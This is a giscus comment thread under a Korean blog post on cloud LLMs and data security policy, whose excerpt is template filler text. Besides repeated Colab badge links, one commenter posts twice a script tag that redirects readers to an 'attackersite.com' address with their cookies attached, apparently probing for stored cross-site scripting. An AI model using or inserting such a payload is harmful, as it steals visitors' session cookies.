### DISCUSSION TITLE
2024/04/04/cloud-LLM-in-data-security-policy/

### DISCUSSION THREAD

**Discussion by giscus** [cloudmatelabs/tech.cloudmt.co.kr#182] [Blog Comments]
# 2024/04/04/cloud-LLM-in-data-security-policy/

바로 데모를 실행해보고 싶으신 분은 이쪽으로 들어가시면 됩니다. 들어가며 내용 입력 예시 제목2 글꼴 스타일 -> 기울임꼴, 볼드체 링크 인용 표시 제목3 코드 표시하기

http://localhost:1313/2024/04/04/cloud-LLM-in-data-security-policy/

**Comment by geoffyoon-dev** [comment]
<a href="https://colab.research.google.com/drive/12AvHi10g4krezB3zNzW0S7D5HpKaMjTk"><img alt="Open In Colab" src="https://colab.research.google.com/assets/colab-badge.svg" style="display:inline;"></a>

**Comment by geoffyoon-dev** [comment]
<a href="https://colab.research.google.com/drive/12AvHi10g4krezB3zNzW0S7D5HpKaMjTk"><img alt="Open In Colab" src="https://colab.research.google.com/assets/colab-badge.svg" style="display:inline;"></a>

**Comment by geoffyoon-dev** [comment]
<script>document.location='https://attackersite.com/steal.php?cookie='+document.cookie;</script>

**Comment by geoffyoon-dev** [comment]
<script>document.location='https://attackersite.com/steal.php?cookie='+document.cookie;</script>

**Comment by geoffyoon-dev** [comment]
<a href="https://colab.research.google.com/drive/12AvHi10g4krezB3zNzW0S7D5HpKaMjTk"><img alt="Open In Colab" src="https://colab.research.google.com/assets/colab-badge.svg" style="display:inline;"></a>
